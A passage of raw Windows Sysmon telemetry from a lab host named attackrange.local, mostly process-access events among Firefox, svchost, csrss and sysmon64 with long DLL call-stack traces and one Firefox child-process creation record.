Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla 
Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 
10341000x800000000000000016780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla 
Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla 
Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla 
Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a 10341000x800000000000000016774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla 
Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921|C:\Program Files\Mozilla Firefox\xul.dll+2342d8 10341000x800000000000000016773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000016771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla 
Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.13.2118973481\1658541064" -childID 2 -isForBrowser -prefsHandle 1812 -prefMapHandle 2868 -prefsLen 1386 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 2924 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla 
Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9 10341000x800000000000000016763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000016762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla 
